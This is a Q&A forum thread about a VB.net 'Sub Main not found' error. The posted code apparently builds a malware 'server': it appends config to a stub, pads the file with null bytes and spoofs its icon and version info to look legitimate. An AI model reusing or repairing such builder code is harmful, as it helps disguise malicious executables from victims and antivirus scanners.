# VB.net Sub Main was not found in 'X'

Tags: vb.net

please i have this problem with vb and i have tried everything to fix it but still cant fix it. Here it is:

```
Const Filesplit = "@rapid@"
    Dim temp As String = IO.Path.GetTempPath() & "\Stub.exe"

    File.WriteAllBytes(temp, My.Resources.Stub)

    If TextBox8.Text.Length > 2 Then
        If File.Exists(temp) = True Then
            Dim icon As New IconFile(TextBox9.Text)
            Dim groupIconResource As GroupIconResource = icon.ConvertToGroupIconResource()
            groupIconResource.SaveTo(temp)
        End If

    End If

    FileOpen(1, temp, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
    stub = Space(LOF(1))
    FileGet(1, stub)
    FileClose(1)

    If File.Exists(TextBox8.Text) Then
        My.Computer.FileSystem.DeleteFile(TextBox8.Text)
    End If

    FileOpen(1, Application.StartupPath & "\" & TextBox8.Text & ".exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
    Dim all As String = ""
    For i = 0 To settings.Length - 1
        all = all & Filesplit & settings(i)
    Next
    FilePut(1, stub & all)

    FileClose(1)
    File.Delete(temp)

    If Form2.CheckBox41.Checked = True Then
        ChngaeAssembly()
    End If


    If ComboBox1.Text = "KB" Then
        Using w As BinaryWriter = New BinaryWriter(New FileStream(Application.StartupPath & "\" & TextBox8.Text & ".exe", FileMode.Append))
            Dim number As Integer = Val(TextBox6.Text)
            For i = 0 To number
                w.Write(New Byte(1024) {})
                w.Flush()
            Next

        End Using
        MsgBox("Successfully built !", MsgBoxStyle.Information, "rapid  V 1.0")
    Else
        Using w As BinaryWriter = New BinaryWriter(New FileStream(Application.StartupPath & "\" & TextBox8.Text & ".exe", FileMode.Append))
            Dim number As Integer = Val(TextBox6.Text * 1000)
            For i = 0 To number
                w.Write(New Byte(1024) {})
                w.Flush()
            Next

        End Using

        MsgBox("Successfully built !", MsgBoxStyle.Information, "rapid")
    End If

    MsgBox("Problem Occured. The Server was not Built.", MessageBoxIcon.Error, "rapid")

End Sub
Private Sub ChngaeAssembly()
    Try
        If File.Exists(Application.StartupPath & "\res.exe") Then
            File.Delete(Application.StartupPath & "\res.exe")
        End If
        If File.Exists(Application.StartupPath & "\assemblychange.res") Then
            File.Delete(Application.StartupPath & "\assemblychange.res")
        End If
        System.IO.File.WriteAllBytes(Application.StartupPath & "\res.exe", My.Resources.Res)
        Dim source As String = My.Resources.String1
        If File.Exists(Application.StartupPath & "\assemblychange.exe") Then
            File.Delete(Application.StartupPath & "\assemblychange.exe")
        End If
        Dim Version = New Collections.Generic.Dictionary(Of String, String) : Version.Add("CompilerVersion", "v2.0")
        Dim Compiler As VBCodeProvider = New VBCodeProvider(Version)
        Dim CompResults As CompilerResults
        Dim ComParameters As New CompilerParameters()
        With ComParameters
            .GenerateExecutable = True
            .OutputAssembly = Application.StartupPath & "\assemblychange.exe"
            .CompilerOptions = "/target:winexe"
            .ReferencedAssemblies.Add("System.dll")
            .ReferencedAssemblies.Add("System.Windows.Forms.dll")
            .MainClass = "X"
        End With
        source = source.Replace("*Title*", Form2.TextBox3.Text)
        source = source.Replace("*Description*", Form2.TextBox4.Text)
        source = source.Replace("*Company*", Form2.TextBox5.Text)
        source = source.Replace("*Product*", Form2.TextBox6.Text)
        source = source.Replace("*Copyright*", Form2.TextBox7.Text)
        source = source.Replace("*Trademark*", Form2.TextBox8.Text)
        source = source.Replace("*version*", String.Format("{0}.{1}.{2}.{3}", Form2.NumericUpDown2.Value, Form2.NumericUpDown3.Value, Form2.NumericUpDown4.Value, Form2.NumericUpDown5.Value))
        source = source.Replace("*fversion*", String.Format("{0}.{1}.{2}.{3}", Form2.NumericUpDown6.Value, Form2.NumericUpDown7.Value, Form2.NumericUpDown8.Value, Form2.NumericUpDown9.Value))
        CompResults = Compiler.CompileAssemblyFromSource(ComParameters, source)
        If CompResults.Errors.Count > 0 Then
            For Each CompilerError In CompResults.Errors
                MessageBox.Show("Error: " & CompilerError.ErrorText, "", MessageBoxButtons.OK, MessageBoxIcon.Error)
            Next
            If File.Exists(Application.StartupPath & "\res.exe") = True Then
                File.Delete(Application.StartupPath & "\res.exe")
            End If
            If File.Exists(Application.StartupPath & "\res.log") = True Then
                File.Delete(Application.StartupPath & "\res.log")
            End If
            If File.Exists(Application.StartupPath & "\res.ini") = True Then
                File.Delete(Application.StartupPath & "\res.ini")
            End If
            If File.Exists(Application.StartupPath & "\assemblychange.exe") Then
                File.Delete(Application.StartupPath & "\assemblychange.exe")
            End If
            If File.Exists(Application.StartupPath & "\assemblychange.res") Then
                File.Delete(Application.StartupPath & "\assemblychange.res")
            End If
            MessageBox.Show("An error occurred. The assembly was not changed.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
            Exit Sub
        End If
        Dim otherfile As String = Application.StartupPath & "\assemblychange.exe"
        Dim resfile As String = Application.StartupPath & "\assemblychange.res"
        Dim mainfile As String = Application.StartupPath & "\" & TextBox8.Text & ".exe"
        Shell(String.Format("{0}res.exe -extract {1},{2},VERSIONINFO,,", System.AppDomain.CurrentDomain.BaseDirectory(), otherfile, resfile))
        Shell(String.Format("{0}res.exe -delete {1},{0}res.exe,VERSIONINFO,,", System.AppDomain.CurrentDomain.BaseDirectory(), mainfile))
        Shell(String.Format("{0}res.exe -addoverwrite {1},{1},{2},VERSIONINFO,1,", System.AppDomain.CurrentDomain.BaseDirectory(), mainfile, resfile))
        If File.Exists(Application.StartupPath & "\assemblychange.exe") Then
            File.Delete(Application.StartupPath & "\assemblychange.exe")
        End If
        If File.Exists(Application.StartupPath & "\assemblychange.res") Then
            File.Delete(Application.StartupPath & "\assemblychange.res")
        End If
        If File.Exists(Application.StartupPath & "\res.exe") = True Then
            File.Delete(Application.StartupPath & "\res.exe")
        End If
        If File.Exists(Application.StartupPath & "\res.log") = True Then
            File.Delete(Application.StartupPath & "\res.log")
        End If
        If File.Exists(Application.StartupPath & "\res.ini") = True Then
            File.Delete(Application.StartupPath & "\res.ini")
        End If
    Catch
    End Try
End Sub
```

When i debug, I get Sub Main was not found in 'X' when i try to change assembly please how do i fix it? Thanks in advance

Comment: What exactly are you trying to do, it looks like you started with a Winform project and are trying to change the Startup Form, if that is the case go to your Projects properties and change it there.

Comment: Am not changing the properties of the winform am changing the properties of the file it creates

Answer (score 2):

One way to get that error is to have Sub Main as a startup object when it doesn't exist.

Under your project properties, Application, Startup Object may be set to "Sub Main" when you don't have a Sub Main. Instead, you can select a form (or sub) that exists in your project.

(This option is limited to forms if "Enable application framework" is checked.)